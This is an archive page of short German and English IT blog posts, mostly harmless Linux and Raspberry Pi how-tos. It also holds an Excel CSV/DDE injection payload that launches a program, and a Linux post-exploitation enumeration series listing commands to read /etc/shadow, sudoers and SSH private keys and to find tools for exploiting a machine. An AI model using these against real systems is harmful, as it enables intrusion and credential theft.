Kategorie: IT
RSS

Excel CSV Injection

2017-11-01 von admin

Vor einiger Zeit wurde eine interessante Möglichkeit identifiziert, um mittels einer CSV Datei eine Ausführung eines beliebigen Programms mit MS Excel zu bewerkstelligen. Als Basis dafür kann eine beliebige CSV Datei verwendet werden:

UserId,Datum,ProjektName,Beschreibung,Dauer
1,2017-11-01,Test Projekt,Das ist ein Test,180
2,2017-08-17,Hausbau,"Haus1, Haus2, Haus3", 240
3,2017-07-25,Wichtiger Kunde,"=2+2+cmd|' /C calc'!A0", 240

In der Zeile drei und in der Spalte Beschreibung wird eine Formel verwendet:

"=2+2+cmd|' /C calc'!A0"

Schritt 1

Als erstes die Datei mit MS Excel öffnen.

Schritt 2

Danach die entsprechenden Zeilen markieren.

Schritt 3

Daraufhin auf den Reiter „DATEN“ wechseln und Button „Text in Spalten“ klicken.

Jetzt dem Wizard mit „Weiter“ folgen.

Die Option „Komma“ wählen und „Fertig stellen“ klicken.

Es erfolgt ein Sicherheitshinweis durch Excel.

Schritt 4

Und siehe da, der Taschenrechner wird gestartet.

 

Quelle

http://georgemauer.net/2017/10/07/csv-injection.html

Kategorie: IT Schlagwörter: , , ,

MBR (Master Boot Record)

2017-10-15 von admin

Der Master Boot Record (MBR) ist ein Startprogramm und befindet sich im ersten Sektor eines bootfähigen Speichermediums (Festplatte, CD, USB, …). Unter Linux ist der MBR meist unter „/dev/hda“ oder „/dev/sda“ zu finden. Die Größe beträgt 512 Byte und unterteilt sich in die Bereiche:

Bereiche Größe
Bootloader 440 Byte
Datenträgersignatur 4 Byte
Null 2 Byte
Partitionstabelle  64 Byte
Bootsektor-Signatur  2 Byte

 

Mit dem Befehl „dd“ kann der MBR in eine separate Datei extrahiert werden.

dd if=/dev/sda of=/tmp/mbr.dmp bs=512 count=1

Um die erstellte Datei anzuschauen, kann ein beliebiger Hex-Editor oder der Befehl „od“ verwendet werden.

od -t x1 /tmp/mbr.dmp
0000000 eb 63 90 10 8e d0 bc 00 b0 b8 00 00 8e d8 8e c0
0000020 fb be 00 7c bf 00 06 b9 00 02 f3 a4 ea 21 06 00
0000040 00 be be 07 38 04 75 0b 83 c6 10 81 fe fe 07 75
0000060 f3 eb 16 b4 02 b0 01 bb 00 7c b2 80 8a 74 01 8b
0000100 4c 02 cd 13 ea 00 7c 00 00 eb fe 00 00 00 00 00
0000120 00 00 00 00 00 00 00 00 00 00 00 80 01 00 00 00
0000140 00 00 00 00 ff fa 90 90 f6 c2 80 74 05 f6 c2 70
0000160 74 02 b2 80 4b 79 7c 5c 00 31 c0 8e d8 8e d0 bc
0000200 00 20 fb a0 64 7c 3c ff 74 02 88 c2 52 bb 17 04
0000220 f6 07 03 74 06 be 88 7d e8 17 01 be 05 7c b4 41
0000240 bb aa 55 cd 13 5a 52 72 3d 81 fb 55 aa 75 37 83
0000260 e1 01 74 32 31 c0 89 44 04 40 88 44 ff 89 44 02
0000300 c7 04 10 00 66 8b 1e 5c 7c 66 89 5c 08 66 8b 1e
0000320 60 7c 66 89 5c 0c c7 44 06 00 70 b4 42 cd 13 72
0000340 05 bb 00 70 eb 76 b4 08 cd 13 73 0d 5a 84 d2 0f
0000360 83 d0 00 be 93 7d e9 82 00 66 0f b6 c6 e8 64 ff
0000400 40 66 89 44 04 0f b6 d1 c1 e2 02 88 e8 88 f4 40
0000420 89 44 08 0f b6 c2 c0 e8 02 66 89 04 66 a1 60 7c
0000440 66 09 c0 75 4e 66 a1 ea 7c 66 31 d2 66 f7 34 88
0000460 d1 31 d2 66 f7 74 04 3b 44 08 7d 37 fe c1 88 c5
0000500 30 c0 c1 e8 02 08 c1 88 d0 5a 88 c6 bb 00 70 8e
0000520 c3 31 0c b8 01 02 cd 13 72 1e 8c c3 60 1e b9 00
0000540 01 8e db 31 f6 bf 00 80 8e c6 fc f3 a5 1f 61 ff
0000560 26 5a 7c be 8e 7d eb 03 be 9d 7d e8 34 00 be a2
0000600 7d c3 2e 00 cd 18 eb fe 47 52 55 42 20 00 47 65
0000620 6f 6d 00 48 61 72 64 20 44 69 73 6b 00 52 65 61
0000640 64 00 20 45 72 72 6f 72 0d 0a 00 bb 01 00 b4 0e
0000660 cd 10 ac 3c 00 75 f4 c3 0c fe b9 00 00 00 80 20
0000700 21 00 83 fe ff ff 00 08 00 00 00 08 e9 02 00 fe
0000720 ff ff 05 fe ff ff fe 17 e9 02 02 a0 fe 0b 00 00
0000740 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0000760 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 aa
0001000

 

Bootloader (440 Byte)

Die ersten 440 Byte gehören zum Bootloader und nach der Ausführung sucht dieser in der Partitionstabelle nach einer aktiven Partition. Je nach System kann es sein, dass der Bootloader größer als 440 Byte ist und sich somit auf dem Dateisystem einer Festplatte befindet oder das ein Bootmanager verwendet wird.

Wenn die aktive Partition gefunden wurde, wird das eigentliche Betriebssystem gestartet.

Datenträgersignatur (4 Byte)

Die Datenträgersignatur (Disk Signature oder Disk identifier) wird von Windows 2000 und XP verwendet, um Datenträger (Partitionen) eindeutig zu identifizieren, bspw. für die Zuordnung von Laufwerksbuchstaben zu einer Partition. Die Datenträgersignatur besteht aus einem zufällig generierten Wert.

Null (2 Byte)

Nach der Datenträgersignatur folgen zwei leere Bytes.

Partitionstabelle (64 Byte)

Die Partitionstabelle teilt sich in vier Sektionen zu 16 Byte auf. Die vier verfügbaren Partitionen sind in Orange, Grün, Magenta und Hellblau hervorgehoben. Die Bedeutung der einzelnen Bytes werden anhand der ersten Partition erläutert.

Byte Größe  Partition 1 Beschreibung
1 80 Gibt an, ob eine Partition gestartet werden kann.

0x80 = bootfähig

0x00 = nicht bootfähig

3 20 21 00 CHS-Eintrag des ersten Sektors
1 83 Kennzeichnung des Partitionstyps.

0x00 = leer/unbenutzt
0x01 = FAT12 ≤ 16MB (hauptsächlich Floppy Disks aber auch Speicherkarten)
0x04 = FAT16 ≤ 32 MiB
0x05 = erweiterte Partition
0x06 = FAT16 > 32 MiB
0x07 = NTFS (Windows NT/2000/XP/Vista/7/8), HPFS (OS/2) oder exFAT
0x0B = FAT32
0x0C = FAT32 mit BIOS-Extensions (LBA)
0x0E = FAT16 > 32 MiB mit BIOS-Extensions (LBA)
0x0F = erweiterte Partition mit BIOS-Extensions (LBA)
0x12 = OEM-Partition für Konfiguration, Diagnose, BIOS-Erweiterung
0x27 = Windows RE versteckte Partition
0x42 = Dynamischer Datenträger
0x82 = Linux Swap/Solaris 2.6 X86 bis Solaris 9 X86
0x83 = Linux Native
0x8E = Linux LVM
0xA5 = FreeBSD
0xA6 = OpenBSD
0xA9 = NetBSD
0xEE = Legacy MBR mit folgendem EFI-Header
0xEF = EFI-Dateisystem

mehr

3 fe ff ff CHS-Eintrag des letzten Sektors
4 00 08 00 00 Startsektor, relativ zum Anfang der Festplatte oder zur erweiterten Partition
4 00 08 e9 02 Anzahl der Sektoren in der Partition per LBA-Methode

 

Bootsektor-Signatur (2 Byte)

Die Bootsektor-Signatur wird auch „Magic Number“ genannt und schließt den MBR ab. Wird die Signatur von einem BIOS gefunden, wird der MBR als gültiger Bootsektor gehandhabt. Fehlt hingegen die Signatur, wird der Bootvorgang abgebrochen.

 

Weiter führende Links

Linux – Boot Prozess

Master Boot Record

Kategorie: IT Schlagwörter: ,

Linux – information gathering (part 4)

2017-10-08 von admin

This is the fourth part of Linux – information gathering.

Network

Find all available network connections.

ifconfig -a

In the following files you can find specific information about the desired network configuration.

cat /etc/network/interfaces
cat /etc/sysconfig/network

You can find the configuration file for DNS resolvers here:

cat /etc/resolv.conf
cat /etc/networks

With the administration tool for IPv4/IPv6 packet filtering and NAT you can list all filters.

iptables -L

Show or set the system’s host name.

hostname

Show the system’s DNS domain name.

dnsdomainname

Connections

The command „lsof“ lists open files.

lsof -i

List port socket numbers of standard services.

cat /etc/services

The command „netstat“ or „chkconfig“ lists network connections

netstat -antup
netstat -antpx
netstat -tulpn
chkconfig --list

Cache

With „arp“ you can manipulate or display the kernel’s IPv4 network neighbour cache.

arp -e

The following command displays existing routes.

route

 

Previous parts

Linux – information gathering (part 1)

Linux – information gathering (part 2)

Linux – information gathering (part 3)

Linux – information gathering (part 4)

Kategorie: IT Schlagwörter:

Raspberry PI: Installation ohne Monitor (Raspbian Stretch)

2017-10-03 von admin

Vor einiger Zeit habe ich das Betriebssystem Raspbian auf einem Raspberry PI installiert. Nachdem sich die Schritte für eine Installationen etwas geändert haben, hier eine überarbeitete Anleitung. Für die Installation wurde folgende Version verwendet:

Raspbian Stretch with desktop
Image with desktop based on Debian Stretch
Version: September 2017
Release date: 2017-09-07
Kernel version: 4.9

 

Schritt 1: Download des Betriebssystems unter https://www.raspberrypi.org/downloads/

wget https://downloads.raspberrypi.org/raspbian_latest

Schritt 2: Formatieren der microSD-Karte mit FAT32. (Hinweis: Die Device Adresse kann von der hier angegebenen abweichen!) Alternativ kann hier auch die Software gparted verwendet werden.

sudo mkfs.vfat /dev/mmcblk0

Schritt 3 (Optional): Vergabe einer Volumenbezeichnung

mlabel -i /dev/mmcblk0 ::meinpi  # for fat32

Schritt 4: Entpacken des runtergeladenen Betriebssystems Images

unzip raspbian_latest.zip

Schritt 5: Image Datei auf die SD-Karte übertragen

dd bs=4M if=2017-09-07-raspbian-stretch.img of=/dev/mmcblk0 conv=fsync

Schritt 6: Danach erneut auf die SD-Karte zugreifen, da aus Sicherheitsgründen SSH per default deaktiviert ist. Für die Aktivierung des Remote-Zugriffs über SSH muss eine eine leere Datei mit dem Namen „ssh“ auf der Boot Partition abgelegt werden.

touch ssh

Schritt 7: Die SD-Karte in den Raspberry Pi schieben bis es leise klickt, dann ist die Karte eingerastet. Danach noch das Netzteil und das Netzwerkkabel anschließen.

Schritt 8: Um den Pi im Netzwerk zu finden, einfach mit nmap scannen oder im Router nachschauen, welche IP Adresse vergeben wurde.

nmap -sP 192.168.168.*

Schritt 9: Erste Anmeldung am Pi mit der gefundenen IP-Adresse.

ssh pi@192.168.168.21

Das default Passwort lautet: raspberry

Schritt 10: Ändern des default Passworts

passwd

Schritt 11: Update des Systems

sudo apt-get update
sudo apt-get dist-upgrade

Schritt 12: Konfiguration des Systems (Uhrzeit, Zeitzone, …)

sudo raspi-config

Schritt 13 (Optional): Remote Desktop installieren

sudo apt-get install xrdp

Der xrdp Prozess wir automatisch beim Starten des Raspberry Pi geladen. Der Status kann wie folgt abgefragt werden:

/etc/init.d/xrdp status

Schritt 14 (Optional): Daraufhin kann eine Remote Desktop Verbindung unter Ubuntu eingerichtet werden. Zu finden ist das Programm im Menü unter „Internet | Zugriff auf entfernte Arbeitsflächen“.

pi3

Nachdem eine Verbindung aufgebaut ist, kann der Desktop verwendet werden.

Kategorie: IT Schlagwörter: , ,

Hack-IT: Reverse Engineering einer Android App

2017-09-28 von admin

Bei diesem Hack-IT geht es um eine Android App, welche im Google Play Store erhältlich ist. Die Aufgabe besteht darin, dass einzugebende Passwort in der App herauszufinden.

Link zur App: https://play.google.com

 

Schritt 1

Für eine Analyse der App muss diese heruntergeladen werden. Dafür gibt es zahlreiche Tools, ich habe die Website apkpure.com verwendet. Im Suchfeld auf der Seite die Adresse der App eingeben und danach den „Download“ Button betätigen. Daraufhin steht die APK Datei zur Verfügung.

 

Schritt 2

Mit der Software dex2jar können DEX Dateien in JAR Dateien umgewandelt werden. Nach dem Download der Software sourceforge.net/projects/dex2jar/ wird das Archiv noch entpackt

unzip dex2jar-2.0.zip

und Rechte vergeben.

chmod -R +x dex2jar-2.0/

Schritt 3

Jetzt kann die APK Datei umgewandelt werden.

./dex2jar-2.0/d2j-dex2jar.sh CanYouHack.apk

Danach steht die Datei „CanYouHack-dex2jar.jar“ zur Verfügung.

Schritt 4

Als nächstes das Programm JD-GUI (jd.benow.ca) herunterladen, mit welchem der Inhalt der JAR Datei ganz einfach angeschaut werden kann.

Daraufhin heißt es suchen, in der Klasse „Mobile1“ wird der hilfreiche Text „… right password!“ aufgeführt.

Die IF-Anweisung darüber verrät uns das gesuchte Passwort:

if (paramAnonymousView.getText().toString().equals("1337"))

Das gesuchte Passwort lautet: 1337 und das Hack-IT ist gelöst.

Kategorie: IT Schlagwörter: , , , , ,

Ubuntu: fehlende Bibliothek libgtk installieren

2017-09-06 von admin

Beim Starten einer neuen Software wurde die Fehlermeldung

error while loading shared libraries: libgtk-x11-2.0.so.0: cannot open shared object file: No such file or directory

angezeigt. Die fehlende Bibliothek konnte ganz einfach installiert werden:

sudo apt-get install libgtk2.0-0:i386

Danach lief die Software wie gewünscht.

Kategorie: IT

MySQL – Speicherplatz optimieren

2017-08-27 von admin

Um den Speicherverbrauch einer MySQL Datenbank zu optimieren, kann das Tool mysqlcheck verwendet werden. Um einen Vorher-Nachher-Vergleich durchführen zu können, sollte vor einer Optimierung ein Blick auf den Verbrauch des Speicherplatzes der einzelnen Schemata durchgeführt werden.

 

Schritt 1: Anmelden am Datenbankserver

Mit dem Befehl „mysql“ an der Datenbank anmelden und danach das Passwort eingeben.

mysql -u username -p

 

Schritt 2: Übersicht Speicherverbrauch je Schema/Tabelle

Wenn für die Anmeldung der User „root“ verwendet wird, dann kann mit folgender SQL-Abfrage eine Auflistung aller Datenbanken und deren Speicherverbrauch abgerufen werden:

SELECT table_schema AS "Datenbank",
ROUND(SUM(data_length + index_length) / 1024 / 1024, 2) AS "Size (MB)"
FROM information_schema.tables
GROUP BY table_schema
ORDER BY table_schema;

Um einen detaillierten Blick auf einzelne Tabellen zu erhalten, wird eine weitere Abfrage benötigt. Dabei wird der jeweilige Tabellenname und der Speicherverbrauch dargestellt. In der WHERE-Klausel muss dafür der Schemaname (schema_name) angegeben werden.

SELECT table_name AS "Tabelle",
ROUND(((data_length + index_length) / 1024 / 1024), 2) AS "Size (MB)"
FROM information_schema.tables
WHERE table_schema = "schema_name"
ORDER BY (data_length + index_length) DESC;

 

Schritt 3: Speicherverbrauch optimieren

Falls der mysql Client noch geöffnet sein sollte, einfach mit „STRG + C“ beenden, um auf die Konsole zu kommen.

Jetzt kann mit dem Befehl „mysqlcheck“ der Speicherplatz der Tabellen optimiert werden:

mysqlcheck -u username -p --optimize --databases meinSchemaname

Danach einfach den Schritt 1 und 2 wiederholen, um den Erfolg zu begutachten. Es ist auch möglich, alle Schemata gleichzeitig zu optimieren, hierfür muss nur der Parameter „–databases“ mit „–all-databases“ ausgetauscht werden und der Wert „meinSchemaname“ entfällt.

 

Weiterführender Link:

MySQL Dokumentation: http://dev.mysql.com/doc/refman/5.5/en/mysqlcheck.html

Kategorie: IT Schlagwörter: , , , ,

Linux – information gathering (part 3)

2017-08-23 von admin

This is the third part of Linux – information gathering.

Log files

In log files you can found useful information, just take a short look at the files in the following directory:

ls -alh /var/log

A detailed explanation can be found here:

 

File System

The command „df“ reports file system disk space usage.

df -h

With the „mount“ command, you can check if there are any attached drives.

mount

Check if there are unused file systems.

cat /etc/fstab

Exploiting

The command „find“ will help to find installed development tools. With these tools, it is possible to exploit the current maschine.

find / -name python*

You can also search for „perl*“ or „gcc*“.

The following programms „wget“, „nc“, „ftp“ and „curl“ can help to transfer software to a maschine. You can find the software in the following way:

find / -name wget

 

Previous parts

Linux – information gathering (part 1)

Linux – information gathering (part 2)

Linux – information gathering (part 3)

Kategorie: IT Schlagwörter:

Linux – information gathering (part 2)

2017-07-27 von admin

This is the secound part of Linux – information gathering.

Peripheral Devices

With the following commands, you get information about peripheral devices. The command „lsusb“ lists all USB devices.

lsusb -l

The command „lspci“ lists all PCI devices.

lspci -l

The command „lpstat“ lists all printer devices.

lpstat -a

Users Information

To find out who you are, you can use „id“. That command prints real and effective user and group IDs.

id

The „who“ command shows who is logged on.

who

Indicates who is logged on the system and what he is doing.

w

With „last“ you can get a list of the last logged-in users.

last

Take a look in the home directories, if you have access to them.

ls -al /root/
ls -al /home/

In this home folders can more user information be found.

cat ~/.bashrc
cat ~/.profile

Some interesting mail information can be found in the following folders:

cat /var/mail/root
cat /var/spool/mail/root

Information about user rights can be found in the following configuration files.

cat /etc/passwd
cat /etc/sudoers
cat /etc/group
cat /etc/shadow

Private Key Information

The private keys can be found in the following folders:

ls ~/.ssh/*
ls /etc/ssh/*

Previous parts

Linux – information gathering (part 1)

Linux – information gathering (part 2)

Linux – information gathering (part 3)

 

Thx @Programming Wolf

Kategorie: IT Schlagwörter:

Ubuntu: Simple Screen Recorder installieren

2017-07-24 von admin

Die Software Simple Screen Recorder wird leider in den Paketquellen von Ubuntu nicht zur Verfügung gestellt. Hier eine kurze Anleitung, wie das Programm installiert werden kann:

Schritt 1: Paketquelle hinzufügen

Mit dem Befehl „add-apt-repository“ und den entsprechenden Parametern wird eine weitere Paketquelle dem System hinzugefügt.

sudo add-apt-repository ppa:maarten-baert/simplescreenrecorder

Schritt 2: Alle Paketquellen aktualisieren

Danach ein Update der Paketquellen durchführen.

sudo apt-get update

Schritt 3: Installation von Simple Screen Recorder

Die Software installieren:

sudo apt-get install simplescreenrecorder simplescreenrecorder-lib

Um 32bit OpenGL Anwendungen auf einem 64bit System aufzunehmen, wird noch folgende Bibliothek benötigt:

sudo apt-get install simplescreenrecorder-lib:i386
Kategorie: IT

Linux – Boot Prozess

2017-06-16 von admin

Vom Einschalten eines PCs bis zur Anmeldung werden verschiedene Phasen durchlaufen. Der Ablauf bei einem Linux Betriebssystem kann wie folgt unterteilt werden:

BIOS/UEFI

Im alltäglichen Sprachgebrauch wird zwischen den beiden Begriffen BIOS und UEFI kaum unterschieden, bzw., es wird meist der Begriff BIOS verwendet. Vereinfacht ausgedrückt, gibt es eine Software auf einem Chip, die nach dem Starten des Rechners angesprochen wird. Diese kann entweder das BIOS oder das UEFI sein.

BIOS UEFI
Basic Input/Output System Unified Extensible Firmware Interface

 

Die Unterscheidung soll nicht Bestandteil des Beitrags sein, kann aber auf den verlinkten Seiten nachgelesen werden. ;)

 

MBR (Master Boot Record)

Der MBR befindet sich im ersten Sektor eines bootfähigen Speichermediums (Festplatte, CD, USB, …). Die Größe des MBR beträgt 512 bytes. Im MBR befinden sich Informationen zum Bootloader, welcher daraufhin geladen und ausgeführt wird.

Der MBR ist meist unter „/dev/hda“ oder „/dev/sda“ zu finden.

 

Bootloader

Für den Einsatz eines Bootloader kann zwischen verschiedenen Programmen ausgewählt werden. Unter Linux ist der Einsatz von Grub (Grand Unified Bootloader) oder dem Vorgänger LILO (Linux Loader) sehr verbreitet.

Wird Grub verwendet, gibt es die Möglichkeit, über ein Menü (/boot/grub) den gewünschten Kernel auszuwählen. Wird keine Auswahl getroffen, wird nach einigen Sekunden die „default“ Einstellung gestartet. Grub lädt daraufhin den konfigurierten Kernel und startet diesen. Der Bootloader übergibt die Steuerung anschließend an das eigentliche Betriebssystem, in diesem Fall an den Linux-Kernel.

Die Einstellungen von Grub können in der Konfigurationsdatei unter „/etc/default/grub“ angepasst werden.

 

Kernel

Der Kernel in Linux steuert alle Betriebssystemprozesse wie Speicherverwaltung, Aufgabenplanung, Input/Output, Interprozesskommunikation und die Gesamtsystemsteuerung. Der Kernel führt die Initialisierung des ersten Prozesses in „/sbin/init“ aus.

Die Durchführung erfolgt in zwei Phasen:

Phase 1: Kernel loading stage

Es wird ein Image File geladen, welcher komprimiert vorliegt (/usr/src). Daraufhin wird das Image dekomprimiert und die Hardware Einstellungen werden festgelegt.

Phase 2: Kernel startup stage

Der Kernel führt den Init-Prozess aus.

 

INIT

Init ist der erste Prozess, welcher gestartet wird. Er besitzt immer die ID 1. Der Init-Prozess startet alle anderen Prozesse. Er ist für die ordnungsgemäße Initialisierung des Systems verantwortlich. Je nachdem, welches Linux verwendet wird, liegt die Konfigurationsdatei unter „/etc/inittab“ oder im Ordner „/etc/init/“.

Diese Datei legt fest, welche Dienste und Daemons in den einzelnen Runlevels verfügbar sind. Auch hier gibt es Alternativen zu „init„, sehr verbreitet ist Upstart oder Systemd.

 

Runlevel

Abhängig von der Standardeinstellung eines „Runlevel“ werden verschiedene Programme aus den folgenden Ordnern ausgeführt:

Runlevel Beschreibung Pfad
0 halt the system /etc/rc.d/rc0.d/
1 single user mode (minimal services) /etc/rc.d/rc1.d/
2 local multi-user mode /etc/rc.d/rc2.d/
3 full multi-user mode /etc/rc.d/rc3.d/
4 unused /etc/rc.d/rc4.d/
5 Identisch mit Level 3, meist mit grafischer Oberfläche /etc/rc.d/rc5.d/
6 reboot the system /etc/rc.d/rc6.d/

 

Beim Systemstart werden alle Runlevel durchlaufen (außer 0). Der Start ist abgeschlossen, wenn der als Standard-Runlevel definierte Runlevel erreicht ist.

 

Weitere Informationen

Kategorie: IT

Linux: Der Befehl top

2017-05-31 von admin

Der Befehl „top“ zeigt alle aktuell laufenden Prozesse des Systems an. Die Anzeige aktualisiert dabei alle 3 Sekunden.

Zeile 1

In der ersten Zeile wird die aktuelle Uhrzeit angezeigt. Daneben wird die Laufzeit des Systems (up) 3 Std. 53 min. dargestellt. Die „load average“ Werte zeigen den durchschnittlichen „load“ der letzten 1, 5 und 15 Minuten an.

Die „load average“ gibt einen Einblick in die Systemauslastung. Der „load“ in Linux-Systemen entspricht der Anzahl an wartenden Prozessen. Der optimale Wert ist identisch der Anzahl der im System vorhandenen Prozessoren. Bspw., wenn ein System über 4 Prozessoren verfügt, liegt der optimale „load“ bei vier.

Alle Werte unterhalb von 4 bedeuten Unterauslastung, alle über 4 stehen für Überlastung.

Zeile 2

Die zweite Zeile informiert über die laufenden Prozesse und ihren aktuellen Zustand.

Label Beschreibung
Tasks Zeigt die Gesamtanzahl der Prozesse auf einem System an.
laufend Zeigt die Anzahl der Prozesse, welche gerade von der CPU ausgeführt werden.
schlafend Zeigt die Anzahl der Prozesse, die auf Bearbeitung durch die CPU warten.
gestoppt Zeigt die Anzahl der Prozesse, die gestoppt wurden.
Zombie Zombie Prozesse

 

Zeile 3

In der dritten Zeile wird die CPU-Auslastung dargestellt.

Label Beschreibung
be CPU-Nutzung von User-Prozessen (user mode)
sy CPU-Nutzung von System- und Kernel-Prozessen
ni CPU-Nutzung von Prozessen, die keine Standard-Priorität besitzen (ni = NICE)
un CPU im Leerlauf (IDLE)
wa Zeit, welche die CPU durch I/O Zugriffe (wait) (bspw. Festplatte) warten muss
hi Zeit, die auf das Bearbeiten von Hardware Interrupts verwendet wird
si Zeit, die auf das Bearbeiten von Software Interrupts verwendet wird
st Zeit, die von der laufenden virtuellen Maschine vom Hypervisor für andere Aufgaben gestohlen (stolen) wird

 

Zeile 4

Die Zeile 4 stellt die Speicherverwendung dar.

Label Beschreibung
total  Zeigt den verfügbaren Arbeitsspeicher an (total = used + free).
used  Zeigt den verwendeten Arbeitsspeicher an.
free  Zeigt den freien Arbeitsspeicher an.
buffers
Speicher, der vom OS reserviert wird, um als Puffer zu fungieren, wenn der Prozess diesen benötigt.

 

Zeile 5

Auf der Zeile 5 wird die Verwendung der Auslagerungsdatei angezeigt.

Label Beschreibung
total  Maximale Größe der Auslagerungsdatei.
used  Verwendete KiB der Auslagerungsdatei.
free  Frei KiB der Auslagerungsdatei.
cached Mem  Gecachte Daten im Arbeitsspeicher.

 

Zeile 6

In dieser Zeile ist eine Übersicht der laufenden Prozesse ersichtlich.

Spalte Beschreibung
PID Prozess-ID
USER Anzeige des Users, welcher den Prozess gestartet hat.
PR Anzeige der Priorität, mit dem der Prozess läuft.
NI Priorität, mit welcher der Prozess gestartet wurde (nice).
VIRT Anzeige des virtuellen Speicherverbrauchs (beinhaltet alle Ressourcen).
RES Speicherverbrauch (RAM) des Prozesses.
SHR

Die Menge an gemeinsam genutztem Speicher für einen Prozess (Shared Memory Size).

S Anzeige des Prozess Status.
D = uninterruptible sleep
R = running
S = sleeping
T = traced or stopped
Z = zombie
%CPU Prozentualer Zeitanteil der CPU für den Prozess.
%MEM Prozentualer Anteil des RAMs für den Prozess.
Zeit+ Die Gesamtzeit, die von der CPU für diesen Prozess aufgewendet wurde.
Befehl Name des Prozesses.

 

Kategorie: IT Schlagwörter: ,

Linux: Auf Daten einer Linux LiveCD zugreifen

2017-05-27 von admin

Vor kurzem bekam ich eine CD in die Hände, auf der eine Linux Distribution installiert war. Bei der Distribution handelte es sich um eine sogenannte LiveCD, d.h., beim Einlegen in das CD-ROM Laufwerk und dem Neustart des PCs wird das Betriebssystem von der CD gestartet (sofern im Bios konfiguriert) und nicht das, welches sich auf der Festplatte befindet. Im Home Verzeichnis einiger User befanden sich Dateien, die ich gern kopieren wollte, ohne das System auf der CD starten zu müssen.

Versucht man direkt auf die CD zuzugreifen, so werden folgende Dateien angezeigt:

Im Ordner „Casper“ befindet sich die Datei „filesystem.squashfs“ mit einer Dateigröße von ca. 700 MB. Diese Datei beinhaltet das Betriebssystem, welches nach dem Booten verwendet wird.

In der Datei sind die jeweiligen Home Laufwerke der User zu finden. Die Dateiendung „squashfs“ gibt Auskunft darüber, um welchen Dateityp es sich handelt. Es ist das komprimierte Dateisystem SquashFS, welches nur lesbar ist.

Um unter Ubuntu direkt auf die Daten der Datei zuzugreifen, wird das Tool „squashfs“ benötigt. Mit dem folgenden Befehl

sudo apt-get install squashfs-tools

kann die Software installiert werden.

 

Variante 1

Mit dem folgenden Befehl werden die Daten aus der Datei „filesystem.squashfs“ in den Ordner „/tmp/cd“ kopiert.

sudo unsquashfs -f -d /tmp/cd /media/CDROM/casper/filesystem.squashfs

Die Pfade müssen entsprechend angepasst werden. Daraufhin konnte ich die gewünschten Dateien kopieren.

 

Variante 2

Eine weitere Variante ist mit dem Befehl „mount“ möglich, damit kann das Dateissystem direkt eingebunden werden.

mount -t squashfs /media/CDROM/casper/filesystem.squashfs /mnt

Mit „umount“ kann dieser Schritt wieder rückgängig gemacht werden.

sudo umount /mnt

 

Kategorie: IT Schlagwörter: , ,

Linux: Weitere Monitorauflösung hinzufügen

2017-05-25 von admin

Der Befehl „xrandr“ kann verwendet werden, um Größe, Ausrichtung oder Reflexion der Ausgänge für einen oder mehrere Bildschirme einzustellen.

xrandr --newmode "1920x1200_60.00" 193.16  1920 2048 2256 2592  1200 1201 1204 1242 -HSync +Vsync

Mit der Option „newmode“ wird eine Monitorgröße angelegt.

xrandr --addmode DP1-1 1920x1200_60.00

Daraufhin wird mit „addmode“ die gewünschten Ausgabe (DP1, VGA1, HDMI1, …) hinzugefügt.

xrandr --output DP1-1 --mode 1920x1200_60.00

Mit „output“ wird dem jeweiligen Ausgabegerät eine neu angelegte Auflösung zugewiesen.

Kategorie: IT Schlagwörter: , , ,

Debian – Tastaturlayout ändern mit einer US-Tastatur

2017-05-17 von admin

Zu dem Beitrag Debian – Tastaturlayout ändern wurde mir von einem aufmerksamen Leser Feedback zugeschickt.

Wenn ein Rechner über eine US-Tastatur verfügt und nicht das gesamte Tastaturlayout auf Deutsch umgestellt werden soll, dann können auch einzelne Tasten separat belegt werden.

Die Caps Lock Taste (die ohnehin nicht verwendet wird) kann so belegt werden, das zwischen „a“ und „ä“ umgeschaltet werden kann, identisch der Shift Taste, welche von Klein- zu Großschreibung wechselt. Große Umlaute (z.B. Ü) können durch „Caps Lock + Shift + U“ realisiert werden. Alle restlichen Sonderzeichen (z.B. @) sind identisch der Abbildung auf der Tastatur zu erreichen.

Die Einstellungen können im Home Verzeichnis des Nutzers in der Datei „~/.Xmodmap“ vorgenommen werden.

keycode 66 = Mode_switch Multi_key
keycode 117 = Mode_switch Multi_key
keycode 39 = s S ssharp
keycode 38 = a A adiaeresis Adiaeresis
keycode 30 = u U udiaeresis Udiaeresis
keycode 32 = o O odiaeresis Odiaeresis
keycode 14 = 5 percent ssharp  degree
keycode 26 = e E egrave Egrave
keycode 28 = t T EuroSign EuroSign
keycode 27 = r R ecircumflex Ecircumflex
keycode 25 = w W eacute Eacute
keycode 31 = i I idiaeresis Idiaeresis
keycode 21 = equal plus plusminus notsign
keycode 57 = n N ntilde Ntilde
keycode 58 = m M Multi_key
keycode 15 = 6 asciicircum dead_acute  dead_circumflex
keycode 19 = 0 parenright degree masculine
keycode 10 = 1 exclam exclamdown onehalf
keycode 54 = c C ccedilla Ccedilla
keycode 24 = q Q copyright registered 

Thx. @wolf

Kategorie: IT Schlagwörter: